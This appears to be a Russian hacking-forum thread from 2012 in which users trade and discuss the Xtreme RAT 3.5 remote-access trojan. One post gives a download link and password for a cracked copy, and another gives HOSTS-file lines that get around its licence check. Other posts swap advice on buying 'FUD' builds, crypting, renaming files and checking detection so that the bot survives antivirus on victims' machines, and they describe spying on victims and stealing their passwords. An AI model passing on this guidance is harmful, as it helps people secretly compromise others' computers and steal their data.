Xtreme RAT 3.5

Тема в разделе "RATs|:|Backdoors", создана пользователем onthar, 3 июн 2010.

1. dep0ison
    dep0ison Новичок
    Симпатии:
    0
    Первый раз, стучал. Потом прикратил сижу через no-ip

8 мар 2012
  2. everest
    everest Новичок
    Симпатии:
    1
    уже 3.5 сломали :af:

11 мар 2012
  3. NightWolf
    NightWolf Guest
    Xtreme Rat 3.5 Cracked by The Old Warrior

Version 3.5
    Changes:

- Added option to Enable or Disable Skins
    - Added option to change creation date of your servers (Select Hide Server)
    - Added Firefox version 10 passwords
    - Option to change groups fixed
    - New skins added (download skins.zip and extract it into skins folder)
    - Option to select a notify image of each server
    - Many small improvements and bugfixes
    - Only ?40 for unlimited connections and free updates.
    - FUD version, unlimited connections and free updates ?100

Version:

3.5

Download Link:
    http://www.mediafire.com/?iiscne5b7blmxtz

Pass: theoldwarrior

12 мар 2012
  4. PhaNtomsss
    PhaNtomsss Новичок
    Симпатии:
    1
    Licensing for this product has a error or has expired!!! Contact the coder for more info.

Вот как-то так.

13 мар 2012
  5. PastorX
    PastorX Новичок
    Симпатии:
    0
    Отпишусь.
    Купил у автора, пользуюсь 4 месяца. Сначала брал просто Full version, неделю назад, доплатив разницу, взял FUD. Full версию, автор обновлял до актуальной по запросу без проблем. Первая FUD версия прожила неделю, спалил нод, проативкой.(сегодня http://scan4you показал 1/37) Вторую версию получил сегодня, написав письмо, через пол часа автор прислал FUD. Опять все чисто.
    Не могу сказать о стабильности, живучести ботов в версии 3.5 поскольку не занимаюсь загрузками, соответственно статистики для анализа маловато. Cтавил я на несколько XP и win7. Все стучит и держится до сих пор.
    Еще заметил, если прикручивать иконку или клеить с другим файлом, сервер выходит не FUD. Я не знаю почему, автору не писал, поскольку мне эти функции не нужны. Но вот факт.
    Как автор поведет себя если просить его часто чистить до FUD, я не знаю. Пока проблем у меня с ним нет.

Последнее редактирование: 15 мар 2012
    15 мар 2012
  6. HLLP
    HLLP Новичок
    Симпатии:
    1
    Открываешь файл "HOSTS" по адресу "C:\windows\system32\drivers\etc\"

Открываешь его с помощью любого текстового редактора и прописываешь туда следующее:

109.163.229.2 google.ru
    213.128.138.236 google.ru

Закрываешь с сохранением файл HOSTS, закрываешь все браузеры, перезапускаешь сетевое соединение с интернетом, или тупо перезагружаешь комп.

Вот и всё теперь крысу можно запускать...

С ув. HLLP - (VazOneZ.com)

16 мар 2012
    1 человеку нравится это.
  7. doctordradd
    doctordradd Новичок
    Симпатии:
    0
    Тоже купил
    2 раза заменил FUD правил, но дает только на сканировании, при запуске бота АВ его удаляет. Из 8 ботов что пробовал, жив 1, живут максимум 2 дня. Автор перестал отвечать, подал вот мэнибэк. Смысла нет совсем, покупать то что вроде бы бы бы работает, причем функционал очень даже интересен показался, с компа жертвы чуть ли не весь комп можно скачать и в реальном времени наблюдение вести, но очень недолго. Не работает слежение за MSN mesenger на семерке - единственнный баг, Если его по любому криптить, лучше деньги на крипт тратить, думаю.
    Работает стабильно на компах с Авирой и без антивируса, больше смысла не видно, запрошенные деньги явно перебор, к тому же самое обидное что перестал отвечать, хотя до оплаты моментально все рассказывал...
    С иконкой сервер живет пару часов, после запуска на компе жертвы сразу его заменил и запустил втихаря еще новый бот, используя команды - 2 дня прожил
    Сделал вывод что дешевле криптить крякнутый, иначе только на домашних компах это.
    после 2-х недель ожидания и заявки в paypal, чел деньги вернул.

22 мар 2012
  8. PastorX
    PastorX Новичок
    Симпатии:
    0
    Не сочтите за рекламу, но у меня вышеописанных проблем ПОКА нету. Сделано 5 обновлений до FUD за 10 дней. Автор выходил на связь постоянно.
    По поводу криптовать крякнутую версию, думаю, результат будет тот же. Поскольку палится он проактивками многими.

22 мар 2012
  9. doctordradd
    doctordradd Новичок
    Симпатии:
    0
    Вам повезло значит...вообще хорошая программа для наблюдения за домашними компами, если их много...
    Мне нужен был спецвариант для Symantec Endpoint Protection +ESET Smart Security. Данные АВ после 2-й правки перестал палить при скане, но удаляли при запуске бота на компе жертвы. Другие АВ, например Маккафи и Нортон удаляют сам бот через 2 дня, симантек при вносе в доверенную зону при запуске тоже через 48 часов хошь не хошь снес его.
    Если крипт хороший, проактивка не будет палить, закриптили мне так, только нужно постоянно обновлять бот перекриптовывая, какой смысл платить за FUD версию?
    но если честно геморрой с автором вышел, т.е. полный заявленный FUD так понимаю он не смог сделать, поэтому и пропал, пару раз изначально ответив, что работает над этим...расчитано на то что если прокатит - хорошо, не прокатит - верну...честнее было б зявить semi FUD...

Ага, кряк не долго продержался :)

Последнее редактирование: 23 мар 2012
    23 мар 2012
  10. DKV
    DKV Новичок
    Симпатии:
    0
    Последнее редактирование: 23 мар 2012
    23 мар 2012
  11. PastorX
    PastorX Новичок
    Симпатии:
    0
    1. Я так понимаю, что FUD-это результат сканирования на сервисе скажем http://scan4you.net в результат 0/37 ? Если я ошибаюсь прошу меня поправить. Если это так, то автор предоставляет такой билд.
    2. Как только "спец вариант" съел ваш трой проактивкой, естественно что через пару часов, дней файл покажет не FUD.
    3. Хороший крипт не должен обходить проактивки, песочницы и т.д., это должен делать ваш трой.
    4. Думаю, что все, что круто пробивает, находится в привате где новичкам его не достать никак. Поэтому вариантов не много. С криптом теже траблы, все нормальное в привате.

Все выше сказанное не претендует на истину.

23 мар 2012
  12. PastorX
    PastorX Новичок
    Симпатии:
    0
    Добавлю.....
    20-03 взял FUD билд, не юзал его, просканировал сегодня, билд остался FUD. ......

26 мар 2012
  13. Sly35
    Sly35 Новичок
    Симпатии:
    0
    Уважаемые, подскажите начинающему. Поставил RAT сделал все в соответствии с видео инструкцией первого поста. С первого раза получилось запустить и даже протестить сервер на своей машине, после чего сам файл сервера и часть RATа уничтожил Kaspersky. После чего я вновь его достал из архива и сделал все тоже самое, но увы больше сервер ни при каком раскладе не заработал. Что делать?

26 мар 2012
  14. KaeraK
    KaeraK Guest
    Сменить название созданного билда + отключить антивирус.

26 мар 2012
  15. Sly35
    Sly35 Новичок
    Симпатии:
    0
    Извиняюсь, за непонятливость. Что значит билд. Это профиль создания сервера или же само название файла сервера?

26 мар 2012
  16. KaeraK
    KaeraK Guest
    Само название файла.

26 мар 2012
  17. KaeraK
    KaeraK Guest
    Закриптовать криптором, или заказать соответствующую услугу за деньги.

27 мар 2012
  18. lacostik
    lacostik Новичок
    Симпатии:
    0
    немогу изменить Ip adress в XtremeRATv3.5

28 мар 2012
  19. PastorX
    PastorX Новичок
    Симпатии:
    0
    Отпишусь. Напомню, речь идет о FUD версии Xtreme RAT 3.5.
    Итак последний FUD билд был получен мною 20-03, мой запрос на новый билд 26-03 - ответ с новым билдом 28-03 , билд оказался 1/37(НОД). Написал новый запрос, ответ - обещание почистить от НОДа. Пауза. Вдогонку два запроса , в ответ тишина по сей день.
    Всего, надеюсь пока, получено 5 билдов FUD. Автор продает за 100 EUR FUD версию. Выводы делаетей сами.
    Як кажуть, далі буде......

4 апр 2012
  20. solom0nkane
    solom0nkane Новичок
    Симпатии:
    0
    при переустановке серва отказывается работать, как в реестре посмотреть ее

4 апр 2012
Загрузка...